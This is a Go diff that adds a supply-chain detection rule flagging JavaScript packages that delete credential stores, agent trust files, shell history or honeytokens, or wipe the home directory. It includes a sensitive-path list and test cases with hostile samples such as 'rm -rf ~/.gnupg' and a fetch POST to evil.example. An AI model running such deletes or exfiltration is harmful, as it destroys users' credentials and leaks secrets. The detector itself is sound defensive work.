+}
+
+// sensitiveDeletePath is a path component/file whose deletion is dangerous.
+// home = true means home-only (standalone HIGH); home = false means
+// project-capable (HIGH only if home-anchored, else needs a strong partner).
+// dir = true means the token names a DIRECTORY, so deleting it (when it is the
+// final path component) needs a dir-capable method, not unlink.
+type sensitiveDeletePath struct {
+	token  string
+	family string
+	home   bool
+	dir    bool
+}
+
+// Ordered longest/most-specific first so .env.production wins over .env and
+// .canarytokens over .canary (the component boundary also disambiguates).
+var sensitiveDeletePaths = []sensitiveDeletePath{
+	{".config/gcloud", "gcloud", true, true},
+	{".bash_history", "history", true, false},
+	{".zsh_history", "history", true, false},
+	{".canarytokens", "honeytoken", true, false},
+	{".security-canary", "honeytoken", true, false},
+	{".honeytoken", "honeytoken", true, false},
+	{".gnupg", "gnupg", true, true},
+	{".canary", "honeytoken", true, false},
+	{".docker", "docker", true, true},
+	{".azure", "azure", true, true},
+	{".kube", "kube", true, true},
+	{".ssh", "ssh", true, true},
+	{".aws", "aws", true, true},
+	{".vscode/settings.json", "vscode", false, false},
+	{".vscode/extensions.json", "vscode", false, false},
+	{".git-credentials", "gitcred", false, false},
+	{".env.production", "env", false, false},
+	{"npm-debug.log", "npmlog", false, false},
+	{".cache/pip/log", "piplog", false, false},
+	{".cursorrules", "cursor", false, false},
+	{".env.local", "env", false, false},
+	{".npm/_logs", "npmlog", false, true},
+	{"CLAUDE.md", "claude", false, false},
+	{".pypirc", "pypirc", false, false},
+	{".claude", "claude", false, true},
+	{".npmrc", "npmrc", false, false},
+	{".netrc", "netrc", false, false},
+	{".env", "env", false, false},
+}
+
+// benignDeleteDirs are cleanup directories: a sensitive component UNDER one of
+// these (/tmp/.ssh, node_modules/.cache) is build/CI cleanup, not a wipe.
+var benignDeleteDirs = map[string]bool{
+	"node_modules": true, "dist": true, "build": true, "coverage": true,
+	".next": true, "out": true, "tmp": true,
+}
+
+// homeRootRe matches a home root with no deeper path -- a broad-wipe target:
+// a per-user home (/home/<u>, /Users/<u>) or /root (root's home, common when
+// package hooks run as root in containers/CI).
+var homeRootRe = regexp.MustCompile(`^(?:(?:/home|/Users)/[^/]+|/root)$`)
+
+// isDeleteComponentByte reports whether c continues a path component. `*` is a
+// literal filename byte for an fs path (so .ssh* != .ssh) but a glob the shell
+// expands (so rm -rf ~/.ssh* can delete ~/.ssh, treated as a component
+// boundary).
+func isDeleteComponentByte(c byte, shell bool) bool {
+	if c == '*' {
+		return !shell
+	}
+	return c >= 'a' && c <= 'z' || c >= 'A' && c <= 'Z' || c >= '0' && c <= '9' ||
+		c == '.' || c == '_' || c == '-'
+}
+
+// matchSensitiveDeletePath finds a sensitive path component in target with
+// path-component boundaries (so .ssh matches ~/.ssh and .ssh/id_rsa but not
+// .ssh.bak, my-canary, or foo.ssh). Returns the entry and the offset where the
+// component starts (target[:at] is the prefix).
+func matchSensitiveDeletePath(target []byte, shell bool) (sensitiveDeletePath, int, bool) {
+	for _, s := range sensitiveDeletePaths {
+		tb := []byte(s.token)
+		for from := 0; from < len(target); {
+			i := bytes.Index(target[from:], tb)
+			if i < 0 {
+				break
+			}
+			at := from + i
+			end := at + len(tb)
+			leadOK := at == 0 || !isDeleteComponentByte(target[at-1], shell)
+			trailOK := end >= len(target) || !isDeleteComponentByte(target[end], shell)
+			if leadOK && trailOK {
+				return s, at, true
+			}
+			from = at + 1
+		}
+	}
+	return sensitiveDeletePath{}, 0, false
+}
+
+func deletePrefixIsBenign(prefix []byte) bool {
+	// A `..` may resolve out of the benign directory (/tmp/../home/u/.ssh), so
+	// the benign exemption cannot be trusted; do not suppress.
+	if bytes.Contains(prefix, []byte("..")) {
+		return false
+	}
+	segs := bytes.Split(prefix, []byte{'/'})
+	// In an absolute home path (/home/<u>/, /Users/<u>/) the <u> segment is a
+	// USERNAME, not a cleanup dir; exclude it so /home/tmp/.ssh (user "tmp")
+	// is not mistaken for a /tmp cleanup.
+	userSeg := -1
+	for i, seg := range segs {
+		if s := string(seg); (s == "home" || s == "Users") && i+1 < len(segs) {
+			userSeg = i + 1
+			break
+		}
+	}
+	for i, seg := range segs {
+		if i == userSeg {
+			continue
+		}
+		s := strings.Trim(strings.TrimSpace(string(seg)), "'\"`")
+		if benignDeleteDirs[s] {
+			return true
+		}
+	}
+	return false
+}
+
+// homeVarRe matches the $HOME / ${HOME} shell variable with a trailing
+// boundary, so $HOME_BACKUP / $HOMEDIR (different variables) do not match.
+var homeVarRe = regexp.MustCompile(`\$\{HOME\}|\$HOME(?:[^A-Za-z0-9_]|$)`)
+
+// deletePrefixIsHomeAnchored reports whether the prefix anchors the path to a
+// user home. ~ / $HOME / ${HOME} are only expanded in a SHELL command; in an
+// fs path literal they are literal directory names, so only the absolute
+// /home/<u>/ and /Users/<u>/ forms anchor an fs path.
+func deletePrefixIsHomeAnchored(prefix []byte, shell bool) bool {
+	// The anchor must be at the START of the path: a relative fixture path that
+	// merely contains a `home`/`Users` segment (vendor/home/u/.npmrc) or a `~`/
+	// `$HOME` past the first token char (build$HOME/.npmrc) is not home-anchored.
+	p := bytes.TrimLeft(prefix, " '\"`")
+	if bytes.HasPrefix(p, []byte("/home/")) || bytes.HasPrefix(p, []byte("/Users/")) ||
+		bytes.HasPrefix(p, []byte("/root/")) {
+		return true
+	}
+	if !shell {
+		return false // ~ / $HOME are literal directory names in an fs path
+	}
+	if len(p) > 0 && p[0] == '~' {
+		return true
+	}
+	loc := homeVarRe.FindIndex(p)
+	return loc != nil && loc[0] == 0
+}
+
+// deleteTargetIsConstructed reports whether the target path contains a segment
+// we cannot evaluate to a concrete sensitive path.
+//
+// For a SHELL target, a `$VAR` other than the recognized $HOME / ${HOME}
+// anchor (or a `${...}` template) is dynamic: `${tmp}/.ssh`,
+// `$HOME_BACKUP/.ssh`, `.ssh${suffix}`.
+//
+// For an fs path LITERAL, Node does not expand `~` or `$VAR` (including
+// `$HOME`), so any such marker means the literal is not the path the author
+// intended and is not a clean bare/absolute reference -- treat it as
+// constructed too (`fs.rmSync('~/.ssh')`, `fs.rmSync('$HOME/.aws')`).
+func deleteTargetIsConstructed(target []byte, shell bool) bool {
+	if !shell {
+		return bytes.IndexByte(target, '$') >= 0 || bytes.IndexByte(target, '~') >= 0
+	}
+	p := homeVarRe.ReplaceAll(target, []byte("/"))
+	return bytes.IndexByte(p, '$') >= 0
+}
+
+// isBroadWipeTarget reports whether the target is the whole home dir or root,
+// including a trailing glob (rm -rf /*, $HOME/*, ~/.*). ~ / $HOME / ${HOME}
+// count only for a SHELL target (they are not expanded in an fs path literal);
+// root and /home/<u> / /Users/<u> count for both.
+func isBroadWipeTarget(target []byte, shell bool) bool {
+	t := bytes.Trim(bytes.TrimSpace(target), "'\"`")
+	if len(t) == 0 {
+		return false // empty literal (fs.rmSync('')) is a no-op, not root
+	}
+	// Strip a trailing glob-only segment (/*, /.*, /**) so /* -> / and
+	// $HOME/* -> $HOME. ONLY a shell expands globs; in an fs path literal `*`
+	// is a literal byte, so /home/u/* is a file named '*', not a wipe.
+	if shell {
+		if i := bytes.LastIndexByte(t, '/'); i >= 0 {
+			if seg := t[i+1:]; len(seg) > 0 && len(bytes.Trim(seg, ".*")) == 0 {
+				t = t[:i+1]
+			}
+		}
+	}
+	t = bytes.TrimRight(t, "/")
+	if len(t) == 0 {
+		return true // originally "/" (or "/*")
+	}
+	if shell {
+		switch string(t) {
+		case "~", "$HOME", "${HOME}":
+			return true
+		}
+	}
+	return homeRootRe.Match(t)
+}
+
+// shell delete-command target extractors. rm/unlink/rmdir take MULTIPLE
+// operands; each non-flag operand (skipping `-x` flags and the `--` sentinel)
+// up to the next command separator is a delete target. (Not quote-aware for
+// paths containing spaces -- a documented limit.)
+var shellDeleteCmdRe = regexp.MustCompile(`(?i)\b(?:rm|unlink|rmdir)\b`)
+var shellFindCmdRe = regexp.MustCompile(`(?i)\bfind\b`)
+
+// shellCmdWrappers run the command that follows them, so a delete after one of
+// these is still a real delete command (sudo rm, xargs rm, then rm).
+var shellCmdWrappers = map[string]bool{
+	"sudo": true, "xargs": true, "env": true, "nice": true, "nohup": true,
+	"time": true, "command": true, "exec": true, "then": true, "do": true, "else": true,
+	"if": true, "while": true, "until": true, "elif": true,
+}
+
+func isShellWordByte(c byte) bool {
+	return c >= 'a' && c <= 'z' || c >= 'A' && c <= 'Z' || c >= '0' && c <= '9' || c == '_' || c == '-'
+}
+
+// isShellTokenByte covers a whole shell token including option flags (-rf),
+// assignments (FOO=1), and path-ish values, so they can be scanned as a unit.
+func isShellTokenByte(c byte) bool {
+	return isShellWordByte(c) || c == '=' || c == '.' || c == '/' || c == ':' || c == '+' || c == '@'
+}
+
+// isShellOptOrAssign reports whether a token is a command-line option (-n,
+// --force) or a VAR=value assignment, both of which may sit between a wrapper
+// (sudo/env) and the actual command.
+func isShellOptOrAssign(tok []byte) bool {
+	if len(tok) == 0 {
+		return false
+	}
+	if tok[0] == '-' {
+		return true
+	}
+	if eq := bytes.IndexByte(tok, '='); eq > 0 {
+		c := tok[0]
+		return c >= 'a' && c <= 'z' || c >= 'A' && c <= 'Z' || c == '_'
+	}
+	return false
+}
+
+// atShellCommandStart reports whether the delete word at p begins a command:
+// at the script start / string quote, after a command separator (; | & ( {
+// newline), or after a command wrapper (sudo/xargs/...). This rejects a delete
+// word that is an ARGUMENT being printed/passed (`echo rm -rf ~/.ssh`).
+func atShellCommandStart(scr []byte, p int) bool {
+	// Glued directly to `=` (no space) means the word is an assignment VALUE
+	// (`FOO=rm echo ...`), not a command -- a real command after an
+	// assignment is space-separated (`FOO=1 rm ...`).
+	if p > 0 && scr[p-1] == '=' {
+		return false
+	}
+	j := p - 1
+	for j >= 0 && (scr[j] == ' ' || scr[j] == '\t') {
+		j--
+	}
+	if j < 0 {
+		return true
+	}
+	switch scr[j] {
+	case ';', '|', '&', '\n', '\r', '(', '{', '`':
+		// A backtick opens a command substitution (the script is the extracted
+		// shell interior, so a remaining backtick is shell, not a JS string
+		// delimiter), so the word after it is a real command.
+		return true
+	case '\'', '"':
+		// Only the script's OPENING delimiter (position 0) is a command
+		// boundary; an inner shell quote means the delete word is quoted data
+		// (`echo "rm -rf ~/.ssh"`, `grep "rm ..." file`).
+		return j == 0
+	}
+	end := j + 1
+	for j >= 0 && isShellTokenByte(scr[j]) {
+		j--
+	}
+	tok := scr[j+1 : end]
+	// An option / assignment (sudo -n rm, env FOO=1 rm) belongs to a wrapper:
+	// skip it and keep scanning back. A wrapper word also continues, but must
+	// itself be at a command start (so `echo sudo rm ...` does not count).
+	if isShellOptOrAssign(tok) || shellCmdWrappers[strings.ToLower(string(tok))] {
+		return atShellCommandStart(scr, j+1)
+	}
+	// A plain word that is itself preceded by an option is that option's VALUE
+	// (sudo -u root rm): skip it and keep scanning back. (echo foo rm -> foo
+	// is preceded by echo, not an option, so it is not skipped.)
+	k := j
+	for k >= 0 && (scr[k] == ' ' || scr[k] == '\t') {
+		k--
+	}
+	pend := k + 1
+	for k >= 0 && isShellTokenByte(scr[k]) {
+		k--
+	}
+	if prev := scr[k+1 : pend]; len(prev) > 0 && prev[0] == '-' {
+		return atShellCommandStart(scr, j+1)
+	}
+	return false
+}
+
+// stripShellQuotes removes all quote characters from a shell token, so a
+// partially quoted operand ("$HOME"/*) normalizes to $HOME/*. (Not
+// quote-semantics-aware: a quoted home var stays treated as expandable, the
+// documented limit.)
+func stripShellQuotes(b []byte) []byte {
+	return bytes.Map(func(r rune) rune {
+		if r == '\'' || r == '"' || r == '`' {
+			return -1
+		}
+		return r
+	}, b)
+}
+
+// shellDelTarget is a delete operand plus the capability of its command:
+//   - canDirFinal: removes a (final) directory -- rmdir, rm -d, rm -r, find
+//     -delete. unlink and a flag-less rm cannot.
+//   - canRecursive: recursively wipes a populated tree -- rm -r/-R/--recursive,
+//     find -delete. Needed for a broad home/root wipe.
+//   - allowBroadWipe: the operand may itself be the broad target ($HOME, /).
+//     True for rm; for find it is true only when the delete is UNFILTERED
+//     (`find $HOME -delete`), false when a predicate narrows it
+//     (`find $HOME -name '*.log' -delete` deletes filtered files, not the root).
+type shellDelTarget struct {
+	path                                      []byte
+	canDirFinal, canRecursive, allowBroadWipe bool
+}
+
+// shellRmFlagCaps reads an rm flag cluster and reports whether it grants
+// recursion (-r/-R/--recursive) or an empty-directory delete (-d).
+func shellRmFlagCaps(flag []byte) (recursive, dirOnly bool) {
+	lf := strings.ToLower(string(flag))
+	if lf == "--recursive" {
+		return true, false
+	}
+	if len(flag) < 2 || flag[1] == '-' {
+		return false, false // a long option other than --recursive
+	}
+	cluster := flag[1:] // short cluster, e.g. -rf / -fd
+	return bytes.ContainsAny(cluster, "rR"), bytes.IndexByte(cluster, 'd') >= 0
+}
+
+// shellRmTargets returns the operands of rm/unlink/rmdir commands (each
+// non-flag operand up to the next separator), tagged with the command's
+// directory/recursive capability so a flag-less rm or unlink of a directory or
+// broad target does not classify as a wipe.
+func shellRmTargets(scr []byte) []shellDelTarget {
+	var out []shellDelTarget
+	for _, m := range shellDeleteCmdRe.FindAllIndex(scr, -1) {
+		if !atShellCommandStart(scr, m[0]) {
+			continue
+		}
+		cmd := strings.ToLower(string(scr[m[0]:m[1]]))
+		seg := scr[m[1]:]
+		if cut := bytes.IndexAny(seg, ";|&\n\r"); cut >= 0 {
+			seg = seg[:cut]
+		}
+		fields := bytes.Fields(seg)
+		// First pass: resolve capability from the command and its flags.
+		var canDirFinal, canRecursive bool
+		switch cmd {
+		case "rmdir":
+			canDirFinal = true // removes empty/final directories
+		case "unlink":
+			// files only
+		default: // rm
+			for _, tok := range fields {
+				if len(tok) == 0 || tok[0] != '-' {
+					continue
+				}
+				if rec, dirOnly := shellRmFlagCaps(tok); rec {
+					canRecursive, canDirFinal = true, true
+				} else if dirOnly {
+					canDirFinal = true
+				}
+			}
+		}
+		// Second pass: collect operands.
+		for _, tok := range fields {
+			if len(tok) > 0 && tok[0] == '-' {
+				continue
+			}
+			t := stripShellQuotes(tok)
+			if len(t) == 0 {
+				continue
+			}
+			out = append(out, shellDelTarget{t, canDirFinal, canRecursive, true}) // rm: operand can be the broad target
+		}
+	}
+	return out
+}
+
+// shellFindTargets returns ALL search roots of a `find <root>... -delete`
+// command (the non-flag operands before the first predicate). An UNFILTERED
+// find (the first predicate is -delete) wipes the whole root, so the root is a
+// broad-wipe target; a FILTERED find (a -name/-type/... predicate precedes
+// -delete) deletes matched entries only, so the root is classified for
+// sensitive paths but not as a broad wipe.
+func shellFindTargets(scr []byte) []shellDelTarget {
+	var out []shellDelTarget
+	for _, m := range shellFindCmdRe.FindAllIndex(scr, -1) {
+		if !atShellCommandStart(scr, m[0]) {
+			continue
+		}
+		seg := scr[m[1]:]
+		if cut := bytes.IndexAny(seg, ";|&\n\r"); cut >= 0 {
+			seg = seg[:cut]
+		}
+		fields := bytes.Fields(seg)
+		hasDelete := false
+		for _, f := range fields {
+			if strings.EqualFold(string(stripShellQuotes(f)), "-delete") {
+				hasDelete = true
+				break
+			}
+		}
+		if !hasDelete {
+			continue // a find without a standalone -delete predicate is a read
+		}
+		i := 0
+		// Skip find GLOBAL options that precede the path operands (-H/-L/-P,
+		// -D <debug>, -O<level>); the predicates (-name/-type/-delete) come
+		// AFTER the roots.
+	skipOpts:
+		for i < len(fields) {
+			s := strings.ToLower(string(stripShellQuotes(fields[i])))
+			switch {
+			case s == "-h" || s == "-l" || s == "-p":
+				i++
+			case s == "-d":
+				i += 2 // -D takes a debug value
+			case strings.HasPrefix(s, "-o"):
+				i++
+			default:
+				break skipOpts
+			}
+		}
+		var roots [][]byte
+		firstPred := ""
+		for ; i < len(fields); i++ {
+			t := stripShellQuotes(fields[i])
+			if len(t) == 0 {
+				continue
+			}
+			if t[0] == '-' {
+				firstPred = strings.ToLower(string(t)) // first predicate ends the root list
+				break
+			}
+			roots = append(roots, t)
+		}
+		// Unfiltered (`find <root> -delete`) wipes the whole root; a filtering
+		// predicate before -delete narrows it.
+		unfiltered := firstPred == "-delete"
+		for _, r := range roots {
+			// find -delete recurses depth-first, removing populated subtrees.
+			out = append(out, shellDelTarget{r, true, true, unfiltered})
+		}
+	}
+	return out
+}
+
+// wiperStrongPartner reports the strong supply-chain partner signals that
+// escalate a sensitive delete to CRITICAL and let a bare-relative
+// project-capable delete fire at all.
+func wiperStrongPartner(m *metrics) bool {
+	return m.HasCISecretRead || m.HasNetworkSink || m.HasSessionSink ||
+		m.HasBunExecution || m.HasGitHubWriteChannel || m.HasDaemonChain ||
+		m.hasObfuscatorShape()
+}
+
+// detectWiperTripwire emits JS_WIPER_TRIPWIRE_001 when package code performs a
+// REAL destructive delete of a sensitive path (credential stores, agent/editor
+// trust, evidence, honeytokens) or a broad home/root wipe. Self-contained like
+// detectHostTamper. Stop-rule: no full shell parser, no variable-to-path
+// dataflow, no dynamic path evaluation beyond os.homedir() / HOME broad wipe.
+//
+// KNOWN LIMITS:
+//   - not shell-quote-aware: shell operands are classified after the
+//     surrounding quotes are stripped, so a QUOTED home var the shell would
+//     NOT expand (`rm -rf '$HOME/.npmrc'`) is treated as home-anchored, which
+//     can over-fire on a project-capable file whose home var was quoted;
+//   - out of scope (spec, PR 1): a direct program-API deleter
+//     (`spawn('rm', ['-rf', path])`, `execFileSync('find', [...])`), `del()`,
+//     and runtime honeytoken creation are not modelled -- without argv
+//     parsing/dataflow they are FP-prone, and shell-launched deletes are the
+//     in-scope surface;
+//   - find predicates are not parsed: a sensitive path that appears only as a
+//     `find <root> -name '.ssh' -delete` predicate (not as a root) is not
+//     matched. Parsing find expressions is the arbitrary-argv-parsing the
+//     rule's stop-rule excludes;
+//   - a backtick template carrying a `${...}` interpolation is treated as
+//     dynamic and skipped, so an ESCAPED template (`\${HOME}`, a static string
+//     in JS) is also skipped (a missed detection, not an over-fire);
+//   - a nested shell launched from inside an exec command
+//     (`exec('sh -c "rm -rf ~/.ssh"')`) is not peeled; the inner script is
+//     quoted data to the outer command scan. Peeling arbitrary nested shells
+//     is the shell-parsing depth the stop-rule excludes;
+//   - execa is bound by call shape (a bare `execa(...)`/`execaCommand(...)`),
+//     not by a verified import: a bare LOCAL helper that shadows the execa name
+//     (`function execaCommand(){}`) is still treated as execa. Receiver calls
+//     (`obj.execaCommand(...)`) are excluded, but import-binding/scope analysis
+//     to reject same-named local functions is the shadowing the stop-rule
+//     excludes. (A nested `sh -c` payload, the common shape here, is already
+//     unmatched per the prior limit.)
+func detectWiperTripwire(path string, m *metrics, content []byte) *types.Finding {
+	view := newJSLexicalView(content)
+	code := view.Code
+	stringRanges := view.StringRanges
+
+	strong := wiperStrongPartner(m)
+	var anyFired, critical bool
+	families := map[string]bool{}
+	firstPos := -1
+	record := func(pos int) {
+		anyFired = true
+		if firstPos < 0 || (pos >= 0 && pos < firstPos) {
+			firstPos = pos
+		}
+	}
+	// Capability gates the classification:
+	//   - a broad home/root wipe needs canRecursive (a populated tree): a
+	//     flag-less rm, rmdir, or unlink cannot perform it.
+	//   - a sensitive DIRECTORY token that is the final path component needs
+	//     canDirFinal (rmdir / rm -d / anything recursive); unlink and a
+	//     flag-less rm only remove files.
+	//   - a file token (or a file inside a sensitive dir) needs neither.
+	classify := func(target []byte, pos int, shell, allowBroadWipe, canDirFinal, canRecursive bool) {
+		if allowBroadWipe && canRecursive && isBroadWipeTarget(target, shell) {
+			critical = true
+			record(pos)
+			return
+		}
+		if deleteTargetIsConstructed(target, shell) {
+			return
+		}
+		sp, at, ok := matchSensitiveDeletePath(target, shell)
+		if !ok {
+			return
+		}
+		// A directory token that is the final path component can only be removed
+		// by a dir-capable method. "Final" means nothing meaningful follows the
+		// token: either the string ends, or only trailing slashes remain
+		// (`.ssh/`). A real subpath after it (`.ssh/id_rsa`) is a file delete,
+		// which any method can do.
+		end := at + len(sp.token)
+		if sp.dir && !canDirFinal && len(bytes.Trim(target[end:], "/")) == 0 {
+			return
+		}
+		prefix := target[:at]
+		if deletePrefixIsBenign(prefix) {
+			return
+		}
+		switch {
+		case sp.home:
+			families[sp.family] = true
+			record(pos)
+		case deletePrefixIsHomeAnchored(prefix, shell):
+			record(pos)
+		case strong:
+			// project-capable, bare-relative: fires only with a partner.
+			record(pos)
+		}
+	}
+
+	// 1. fs / fs-extra / rimraf delete calls.
+	osBindings := collectModuleBindings(code, stringRanges,
+		osModuleAliasRe, osModuleAliasESMRe, osDestructureRe, osDestructureESMRe, osModuleAliasESMCombinedRe)
+	for _, c := range collectFSDeleteCalls(code, stringRanges) {
+		// A broad home wipe targets a populated directory tree; only a
+		// recursive method (rm/fs.rm with recursive, fs-extra remove, rimraf)
+		// can perform it -- not unlink and not a non-recursive rm.
+		if c.canRecursive && isBroadHomePathArg(code[c.pathStart:c.pathEnd], osBindings) {
+			critical = true
+			record(c.pathStart)
+			continue
+		}
+		// The path must be a SINGLE string literal spanning the whole first
+		// argument: a concatenation, template, or method-call tail
+		// ('.ssh' + x, `${tmp}/.ssh`, '.ssh'.replace(...)) is dynamic.
+		target, ok := wholeStringLiteralInterior(code[c.pathStart:c.pathEnd])
+		if !ok {
+			continue
+		}
+		classify(target, c.pathStart, false, true, c.canDirFinal, c.canRecursive)
+	}
+
+	// 2. bound shell delete commands. find roots do NOT allow a broad-home
+	// classification: `find $HOME -name '*.log' -delete` deletes filtered
+	// files, not the home root.
+	scripts, starts := collectBoundShellCommands(view, stringRanges)
+	for i, scr := range scripts {
+		for _, t := range shellRmTargets(scr) {
+			classify(t.path, starts[i], true, t.allowBroadWipe, t.canDirFinal, t.canRecursive)
+		}
+		for _, t := range shellFindTargets(scr) {
+			classify(t.path, starts[i], true, t.allowBroadWipe, t.canDirFinal, t.canRecursive)
+		}
+	}
+
+	if !anyFired {
+		return nil
+	}
+	sev := types.SeverityHigh
+	if critical || strong || len(families) >= 2 {
+		sev = types.SeverityCritical
+	}
+	line := 1
+	if firstPos >= 0 {
+		line = lineOf(code, firstPos)
+	}
+	return &types.Finding{
+		RuleID:   RuleWiperTripwire,
+		RuleName: "Destructive wipe of sensitive paths",
+		Severity: sev,
+		Category: "supply-chain",
+		Description: "Package JavaScript performs a REAL destructive delete of a sensitive " +
+			"path -- a credential store (.ssh/.aws/.gnupg/.kube/...), agent/editor trust " +
+			"(.claude/.vscode/...), shell history, an evidence log, or a honeytoken -- or a " +
+			"broad wipe of $HOME/~/root, through a bound fs/fs-extra/rimraf delete or a bound " +
+			"shell rm/unlink/rmdir/find -delete. Build/cache cleanup (node_modules, dist, " +
+			"/tmp, ...) and sibling/builder paths do not match. CRITICAL on a broad home/root " +
+			"wipe, on deleting two distinct credential stores, or when paired with a strong " +
+			"supply-chain partner.",
+		FilePath:    path,
+		Line:        line,
+		MatchedText: "destructive delete of a sensitive path",
+		Analyzer:    AnalyzerName,
+		// Above the generic command-execution rule's confidence so this
+		// specific supply-chain finding survives same-line cross-rule dedup
+		// (a shell rm of a sensitive path also matches CMDEXEC_004).
+		Confidence: 0.92,
+		Remediation: "Package install/runtime code has no legitimate reason to delete " +
+			"credential stores, agent trust files, history, or the home directory. Inspect " +
+			"the file in a clean clone, remove the package, and audit the host for missing or " +
+			"altered credentials and trust files.",
+	}
 }
 
 // collectShelljsExecCalls returns the call sites of real shelljs `.exec(...)`
@@ -3058,6 +4122,34 @@ var fsModuleAliasESMRe = regexp.MustCompile(
 var fsModuleAliasESMCombinedRe = regexp.MustCompile(
 	`import\s+([A-Za-z_$][\w$]*)\s*,\s*(?:\*\s+as\s+[A-Za-z_$][\w$]*|\{[^}]+\})\s+from\s*['"](?:node:)?(?:fs|fs-extra|fs/promises)['"]`,
 )
+
+// fs/promises (and fs.promises) aliasing forms. A binding to this module is
+// async-only: a *Sync method on it does not exist, so it cannot delete.
+// The destructure-with-rename form (`const { promises: fsp } = require('fs')`)
+// is already covered by sourceByLocal[fsp] == "promises".
+var fsPromisesAliasRequireRe = regexp.MustCompile(
+	`(?:(?:const|let|var)\s+|,\s*)([A-Za-z_$][\w$]*)\s*=\s*require\s*\(\s*['"](?:node:)?fs/promises['"]\s*\)`,
+)
+var fsPromisesAliasDotRe = regexp.MustCompile(
+	`(?:(?:const|let|var)\s+|,\s*)([A-Za-z_$][\w$]*)\s*=\s*require\s*\(\s*['"](?:node:)?fs['"]\s*\)\s*\.\s*promises\b`,
+)
+var fsPromisesAliasESMRe = regexp.MustCompile(
+	`import\s+(?:\*\s+as\s+)?([A-Za-z_$][\w$]*)\s+from\s*['"](?:node:)?fs/promises['"]`,
+)
+
+// fsPromisesAliasESMCombinedRe captures the DEFAULT alias in a combined
+// fs/promises import (`import fsp, { rm } from 'fs/promises'`); the generic fs
+// combined regex would otherwise record fsp as a plain fs alias.
+var fsPromisesAliasESMCombinedRe = regexp.MustCompile(
+	`import\s+([A-Za-z_$][\w$]*)\s*,\s*(?:\*\s+as\s+[A-Za-z_$][\w$]*|\{[^}]+\})\s+from\s*['"](?:node:)?fs/promises['"]`,
+)
+var fsPromisesDestructureRe = regexp.MustCompile(
+	`(?:(?:const|let|var)\s+|,\s*)\{\s*([^}]+)\s*\}\s*=\s*require\s*\(\s*['"](?:node:)?fs/promises['"]\s*\)`,
+)
+var fsPromisesDestructureESMRe = regexp.MustCompile(
+	`import\s+(?:[A-Za-z_$][\w$]*\s*,\s*)?\{\s*([^}]+)\s*\}\s*from\s*['"](?:node:)?fs/promises['"]`,
+)
+
 var fsDestructureRe = regexp.MustCompile(
 	`(?:(?:const|let|var)\s+|,\s*)\{\s*([^}]+)\s*\}\s*=\s*require\s*\(\s*['"](?:node:)?(?:fs|fs-extra|fs/promises)['"]\s*\)`,
 )
@@ -3247,6 +4339,9 @@ func detect(path string, m *metrics, content []byte) []types.Finding {
 		out = append(out, *f)
 	}
 	out = append(out, detectHostTamper(path, m, content)...)
+	if f := detectWiperTripwire(path, m, content); f != nil {
+		out = append(out, *f)
+	}
 	return out
 }
 

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -3467,3 +3467,966 @@ func TestHostTamper(t *testing.T) {
 		})
 	}
 }
+
+func TestWiperTripwire(t *testing.T) {
+	cases := []struct {
+		name, content string
+		want          bool // expect JS_WIPER_TRIPWIRE_001
+		crit          bool
+	}{
+		// --- true positives: home-only credential/history/honeytoken (HIGH) ---
+		{
+			name:    "fs rmSync .ssh (home-only) -> HIGH",
+			content: "const fs = require('fs');\nfs.rmSync('.ssh', { recursive: true });\n",
+			want:    true,
+		},
+		{
+			name:    "fs rmSync /home/u/.aws -> HIGH",
+			content: "const fs = require('fs');\nfs.rmSync('/home/user/.aws', { recursive: true, force: true });\n",
+			want:    true,
+		},
+		{
+			name:    "fs-extra removeSync .aws -> HIGH",
+			content: "const fse = require('fs-extra');\nfse.removeSync('.aws');\n",
+			want:    true,
+		},
+		{
+			name:    "rimraf .kube -> HIGH",
+			content: "const rimraf = require('rimraf');\nrimraf('.kube', () => {});\n",
+			want:    true,
+		},
+		{
+			name:    "fs.promises destructured rm .gnupg -> HIGH",
+			content: "const { rm } = require('fs').promises;\nawait rm('.gnupg', { recursive: true });\n",
+			want:    true,
+		},
+		{
+			name:    "fs unlinkSync .bash_history -> HIGH",
+			content: "const fs = require('fs');\nfs.unlinkSync('.bash_history');\n",
+			want:    true,
+		},
+		{
+			name:    "fs unlinkSync .canary honeytoken -> HIGH",
+			content: "const fs = require('fs');\nfs.unlinkSync('.canary');\n",
+			want:    true,
+		},
+		{
+			name:    "fs rmSync .canarytokens -> HIGH",
+			content: "const fs = require('fs');\nfs.rmSync('.canarytokens', { recursive: true });\n",
+			want:    true,
+		},
+		{
+			name:    "fs rmSync .docker (home-only) -> HIGH",
+			content: "const fs = require('fs');\nfs.rmSync('/home/dev/.docker', { recursive: true });\n",
+			want:    true,
+		},
+		{
+			name:    "fs rmSync .config/gcloud -> HIGH",
+			content: "const fs = require('fs');\nfs.rmSync('/home/dev/.config/gcloud', { recursive: true });\n",
+			want:    true,
+		},
+		// --- shell home-only ---
+		{
+			name:    "shell rm -rf ~/.gnupg -> HIGH",
+			content: "require('child_process').execSync('rm -rf ~/.gnupg');\n",
+			want:    true,
+		},
+		{
+			name:    "shell find ~/.ssh -delete -> HIGH",
+			content: "require('child_process').execSync('find ~/.ssh -type f -delete');\n",
+			want:    true,
+		},
+		{
+			name:    "spawn sh -c rm -rf ~/.ssh -> HIGH",
+			content: "const cp = require('child_process');\ncp.spawn('sh', ['-c', 'rm -rf ~/.ssh']);\n",
+			want:    true,
+		},
+		{
+			name:    "shelljs exec rm -rf ~/.aws -> HIGH",
+			content: "const sh = require('shelljs');\nsh.exec('rm -rf ~/.aws');\n",
+			want:    true,
+		},
+		// --- project-capable: home-anchored fires (HIGH) ---
+		{
+			name:    "shell unlink ~/.npmrc (anchored) -> HIGH",
+			content: "require('child_process').execSync('unlink ~/.npmrc');\n",
+			want:    true,
+		},
+		{
+			name:    "fs unlinkSync /home/u/.npmrc (anchored) -> HIGH",
+			content: "const fs = require('fs');\nfs.unlinkSync('/home/dev/.npmrc');\n",
+			want:    true,
+		},
+		{
+			name:    "shell rm ~/CLAUDE.md (anchored) -> HIGH",
+			content: "require('child_process').execSync('rm ~/CLAUDE.md');\n",
+			want:    true,
+		},
+		// --- project-capable bare + strong partner -> CRITICAL ---
+		{
+			name:    "delete .env bare + fetch exfil -> CRITICAL",
+			content: "const fs = require('fs');\nfs.unlinkSync('.env');\nfetch('https://evil.example/x', { method: 'POST', body: d });\n",
+			want:    true, crit: true,
+		},
+		// --- home-only + strong partner -> CRITICAL ---
+		{
+			name:    "delete .ssh + Bun second stage -> CRITICAL",
+			content: "const fs = require('fs');\nrequire('child_process').spawn('bun', ['./s.mjs']);\nfs.rmSync('.ssh', { recursive: true });\n",
+			want:    true, crit: true,
+		},
